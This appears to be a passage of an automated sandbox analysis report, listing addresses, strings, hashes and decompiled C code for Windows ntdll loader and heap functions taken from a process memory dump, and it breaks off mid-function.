0x04ab18f4
0x04ab190a
0x04ab190f
0x04ab1925
0x04ab192c
0x04ab1931
0x04ab193a
0x04ab193e
0x04ab1940
0x04ab1947
0x04ab1948
0x04ab1948
0x04ab193e
0x04ab18e5
0x04ab194f
0x04ab1952
0x04ab1956
0x04ab195d
0x04ab1961
0x04ab196d
0x00000000
0x04ab196d
0x04ab188a
0x04ab188f
0x04ab1891
0x00000000
0x00000000
0x04ab189d
0x00000000
0x04ab189d
0x04ab184c
0x04ab1859
0x04ab1859
0x04ab185c
0x00000000
0x00000000
0x04ab1851
0x04ab1853
0x04ab1855
0x04ab1865
0x04ab1865
0x04ab1866
0x04ab1868
0x04ab1870
0x00000000
0x04ab1870
0x04ab1857
0x04ab1857
0x04ab185e
0x00000000
0x04ab16d2
0x04ab16d2
0x04ab16d5
0x04ab16d5
0x04ab16d8
0x04ab16da
0x04ab16dd
0x04ab16e0
0x04ab16e3
0x04ab16e5
0x04ab1808
0x04ab1808
0x04ab1809
0x04ab1812
0x04ab1817
0x04ab1817
0x00000000
0x04ab1817
0x04ab16eb
0x04ab16ed
0x00000000
0x00000000
0x04ab16f6
0x04ab16f9
0x04ab16ff
0x04ab1701
0x04ab172c
0x04ab172c
0x04ab172f
0x04ab1732
0x04ab1734
0x04ab1737
0x04ab173b
0x04ab175e
0x04ab175e
0x04ab1761
0x04ab1764
0x04ab176d
0x04ab1774
0x04ab1777
0x04ab177a
0x04ab177c
0x04ab177f
0x04ab1781
0x04ab1781
0x04ab1784
0x04ab1784
0x04ab177f
0x04ab178c
0x04ab1791
0x04ab1796
0x04ab1799
0x04ab179c
0x04ab179e
0x04ab17a5
0x04ab17a9
0x04ab17c9
0x04ab17ce
0x04ab17ab
0x04ab17c1
0x04ab17c6
0x04ab17dc
0x04ab17e3
0x04ab17e8
0x04ab17ee
0x04ab17f1
0x04ab17f5
0x04ab17f7
0x04ab17fe
0x04ab17ff
0x04ab17ff
0x04ab17f5
0x04ab179c
0x00000000
0x04ab1764
0x04ab1741
0x04ab1746
0x04ab1748
0x00000000
0x00000000
0x04ab1754
0x00000000
0x04ab1754
0x04ab1703
0x04ab1710
0x04ab1710
0x04ab1713
0x00000000
0x00000000
0x04ab1708
0x04ab170a
0x04ab170c
0x04ab171c
0x04ab171c
0x04ab171d
0x04ab171f
0x04ab1727
0x00000000
0x04ab1727
0x04ab170e
0x04ab170e
0x04ab1715
0x00000000
0x04ab1715
0x04ab16cc
0x04a69a45
0x04a69a45
0x04a69a0e
0x04a69a1c
0x04a69a23
0x04ab167e
0x04ab167f
0x04ab1681
0x04ab1683
0x04ab1684
0x00000000
0x04ab1684
0x00000000
0x04a69aad
0x04a69aad
0x04a69ab0
0x04a69ab3
0x04a69ab3
0x04a69ab6
0x00000000
0x00000000
0x04a69ab8
0x04a69aba
0x04a69abc
0x04a69ac8
0x04a69ac8
0x00000000
0x04a69abe
0x04a69abe
0x04a69ac0
0x00000000
0x04a69ac0
0x04a69abc
0x04a69ad2
0x00000000
0x04a69ad2
0x04a69aab

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 04AB1572, 04AB1639, 04AB17DE, 04AB1927
HEAP: , xrefs: 04AB155D, 04AB1624, 04AB17C9, 04AB1912
HEAP[%wZ]: , xrefs: 04AB1550, 04AB1617, 04AB17BC, 04AB1905

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: e33a6b14907001cf37f274da23d1e90002281a79c77e50c8f5efdcf07d581893
Instruction ID: 58dbd7091a5559e67fde839d858e45251c76c6773c533106e8f94efe881767ba
Opcode Fuzzy Hash: e33a6b14907001cf37f274da23d1e90002281a79c77e50c8f5efdcf07d581893
Instruction Fuzzy Hash: 3822E4706002459FEB24CF68C4A4BBABBF9FF45744F148569E8968B346E735F881CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A58794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04A58794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04A5934A() != 0) {
								_t159 = E04ACA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4b35780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04AC5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4b35780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04A5849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04A58999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04A58999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4b35c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4b35c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04A62280(_t92, 0x4b386cc);
															_t94 = E04B19DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04A761A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4b35c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04A58A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4b35c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4b35c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04A8F380(_t136, 0x4a21184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04A62280(_t108, 0x4b386cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04A761A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04B19D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04A5FFB0(_t118, _t156, 0x4b386cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04A89A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x04a58799
0x04a5879d
0x04a587a1
0x04a587a3
0x04a587a8
0x04a587c3
0x04a587c3
0x04a587c8
0x04a587d1
0x04a587d4
0x04a587d8
0x04a587e5
0x04a587ec
0x04aa9bfe
0x04aa9c00
0x04aa9c02
0x04aa9c08
0x04aa9c0d
0x04aa9c0f
0x04aa9c14
0x04aa9c2d
0x04aa9c32
0x04aa9c37
0x04aa9c3a
0x04aa9c3c
0x04aa9c42
0x04aa9c42
0x04aa9c3c
0x04aa9c02
0x04a587da
0x04a587df
0x04a587e3
0x00000000
0x00000000
0x04a587e3
0x04a587f2
0x00000000
0x04a587fb
0x04a587fd
0x04a587fe
0x04a5880e
0x04a5880f
0x04a58810
0x04a58814
0x04a5881a
0x04a5881c
0x04a5881f
0x04a58821
0x04a58822
0x04a58824
0x04a58826
0x04a5882c
0x04a5882e
0x04aa9c48
0x04aa9c48
0x04a58834
0x04a58834
0x04a58837
0x00000000
0x00000000
0x04a58837
0x04a5882e
0x04a5883d
0x04a58840
0x04a58843
0x04a58846
0x04a58849
0x04a5884c
0x04a5884e
0x04a58850
0x04a58852
0x04a58854
0x04a58857
0x04a588b4
0x04a588b6
0x04a588b6
0x04a58859
0x04a58859
0x04a58859
0x04a58861
0x04a58866
0x04a5886a
0x04a5893d
0x04a58941
0x00000000
0x04a58947
0x04a58947
0x04a5894a
0x04a5894c
0x00000000
0x04a58952
0x04a58955
0x04a5895a
0x04a5895d
0x04a5895d
0x04a5895f
0x04a58961
0x04a58961
0x04a58968
0x00000000
0x00000000
0x04a5896a
0x04a5896b
0x04a5896e
0x00000000
0x04a58970
0x04a58970
0x04a58970
0x04a58970
0x04a58972
0x04a58972
0x04a58974
0x00000000
0x04a5897a
0x04a5897a
0x04a5897d
0x00000000
0x04a58983
0x04aa9c65
0x04aa9c6d
0x04aa9c72
0x04aa9c75
0x04aa9c75
0x04aa9c82
0x04aa9c86
0x04aa9c87
0x04aa9c88
0x04aa9c89
0x04aa9c8c
0x04aa9c90
0x04aa9c95
0x04aa9c97
0x04aa9ca0
0x04aa9ca3
0x04aa9ca9
0x04aa9ca9
0x00000000
0x04aa9ca9
0x04aa9ca3
0x00000000
0x04aa9c97
0x04a5897d
0x00000000
0x04a58974
0x04a58988
0x04a58992
0x04a58996
0x00000000
0x04a58996
0x04a5894c
0x00000000
0x04a58870
0x04a5887b
0x04a5887d
0x04a5887f
0x04a58881
0x04a58884
0x04a58884
0x04a58886
0x04a58889
0x04a5888c
0x04a5888e
0x04a58891
0x04a58891
0x04a58898
0x00000000
0x00000000
0x04a5889a
0x04a5889b
0x04a5889e
0x00000000
0x00000000
0x04a588a0
0x04a588a8
0x04a588b0
0x04a588b2
0x04a588d3
0x04a588d5
0x00000000
0x04a588d7
0x04a588db
0x04a588dc
0x04a588e0
0x04a588e8
0x04a588ee
0x04a588f0
0x04a588f3
0x04a588fc
0x04a58901
0x04a58906
0x04a5890c
0x04a5890c
0x04a5890f
0x04a58916
0x04a58917
0x04a58918
0x04a58919
0x04a5891a
0x04a5891f
0x04a58921
0x04aa9c52
0x04aa9c55
0x04aa9c5b
0x04aa9cac
0x04aa9cc0
0x04aa9cc0
0x04aa9c55
0x04a58927
0x04a58927
0x04a5892f
0x04a58933
0x00000000
0x04a588f5
0x04a588f5
0x00000000
0x04a588f7
0x04a588f7
0x04a588fa
0x00000000
0x00000000
0x00000000
0x00000000
0x04a588fa
0x04a588f5
0x04a588f3
0x00000000
0x04a588d5
0x00000000
0x04a588b2
0x04a588c9
0x00000000
0x04a588c9
0x04a5887f
0x04a5886a
0x04a58857
0x04a58852
0x04a588bf
0x04a588bf
0x04a587aa
0x04a587ad
0x04a587ae
0x04a587b4
0x04a587b5
0x04a587b6
0x04a587b8
0x04a587bd
0x04a587c1
0x04a587f4
0x04a587fa
0x00000000
0x00000000
0x00000000
0x04a587c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 04AA9C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04AA9C18
LdrpDoPostSnapWork, xrefs: 04AA9C1E

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: d116e51fc4cd1fd670f503ce32ab66829ac44fa27fa56d054666ffe72a10482f
Instruction ID: bec502bafaa551a11ac9d2180273ab99f1093d239ee6c98039c61f3f105c8a21
Opcode Fuzzy Hash: d116e51fc4cd1fd670f503ce32ab66829ac44fa27fa56d054666ffe72a10482f
Instruction Fuzzy Hash: 8691F4B1A00616EFEB18EF59C681ABAB3B5FF44355B44446DEC05AB260E734FD21CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A6B73D, Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04A6B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E04B0A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x4b38748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E04A4B150();
					} else {
						E04A4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E04A4B150();
					__eflags =  *0x4b37bc8;
					if(__eflags == 0) {
						E04B02073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E04B0A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x4b38720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x4b38720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E04A6B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E04B0A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E04A6E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x04a6b746
0x04a6b74b
0x04a6b74d
0x04a6b750
0x04a6b755
0x04a6b758
0x04a6b758
0x04a6b75e
0x04a6b763
0x04a6b764
0x04a6b76a
0x04a6b76d
0x04a6b771
0x04a6b776
0x04a6b85c
0x04a6b85d
0x04a6b860
0x04a6b865
0x04ab2ba1
0x04ab2ba2
0x04ab2ba9
0x04ab2bae
0x04ab2bae
0x04a6b77c
0x04a6b77c
0x04a6b77c
0x04a6b785
0x04a6b788
0x04ab2bb6
0x04ab2bb9
0x00000000
0x00000000
0x04ab2bbf
0x04ab2bc5
0x04ab2bc9
0x04ab2be8
0x04ab2bed
0x04ab2bcb
0x04ab2be0
0x04ab2be5
0x04ab2bf3
0x04ab2bf8
0x04ab2bfd
0x04ab2c05
0x04ab2c0e
0x04ab2c0e
0x00000000
0x04a6b78e
0x04a6b78e
0x04a6b78e
0x04a6b791
0x04a6b791
0x04a6b797
0x04a6b797
0x04a6b79f
0x04a6b7a9
0x04a6b7af
0x04a6b7af
0x04a6b7b1
0x04a6b7b6
0x04a6b7e2
0x04a6b7e2
0x04a6b7e7
0x04a6b880
0x04a6b7ed
0x04a6b7ed
0x04a6b7ed
0x04a6b7ef
0x04a6b7f2
0x04a6b7f2
0x04a6b7f5
0x04a6b7fa
0x04ab2c2d
0x04ab2c2e
0x04ab2c39
0x04a6b800
0x04a6b800
0x04a6b802
0x04a6b805
0x04a6b808
0x04a6b808
0x04a6b80a
0x04a6b80d
0x04a6b816
0x04a6b81c
0x04a6b822
0x04a6b82f
0x04a6b88b
0x04a6b892
0x04a6b897
0x04a6b899
0x04a6b89b
0x04a6b89e
0x04a6b8a5
0x04a6b8a8
0x04a6b8aa
0x04a6b8ac
0x04a6b8ac
0x04a6b8aa
0x04a6b892
0x04a6b831
0x04a6b839
0x04a6b83b
0x04a6b83b
0x04a6b844
0x04a6b84b
0x04a6b852
0x04a6b7b8
0x04a6b7ba
0x04a6b7bf
0x04a6b7c4
0x04ab2c18
0x04ab2c19
0x04ab2c23
0x04a6b7ca
0x04a6b7ca
0x04a6b7cc
0x04a6b7cf
0x04a6b7d1
0x04a6b7d1
0x04a6b7d4
0x04a6b7dc
0x04a6b8bb
0x04a6b8bb
0x04a6b8be
0x04a6b8be
0x04a6b8c1
0x00000000
0x00000000
0x04a6b8c3
0x04a6b8c5
0x04a6b8c7
0x04a6b8e0
0x00000000
0x04a6b8e0
0x04a6b8cc
0x04a6b8cc
0x00000000
0x04a6b8cc
0x04a6b8d6
0x04a6b8d6
0x00000000
0x04a6b7dc
0x04a6b7b6

Strings

HEAP: , xrefs: 04AB2BE8
HEAP[%wZ]: , xrefs: 04AB2BDB
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 04AB2BF3

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: f2882d735e380908eca80eec445511887b075f1dcc71863a5f65c0f39df5bd4b
Instruction ID: 24a0d5008cf474f4adeac58f999f62340ff281f8e6b9e68051efe9185c123395
Opcode Fuzzy Hash: f2882d735e380908eca80eec445511887b075f1dcc71863a5f65c0f39df5bd4b
Instruction Fuzzy Hash: B0619F71601255DFDB28DF28C585BAABBF5FF44304F1485AAE84ACB281D730F891CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04A57E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E04A57E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04A5CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04A4C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4b35780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04AC5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4b35780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04A67D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04A67D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04AC7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04A67D50() != 0) {
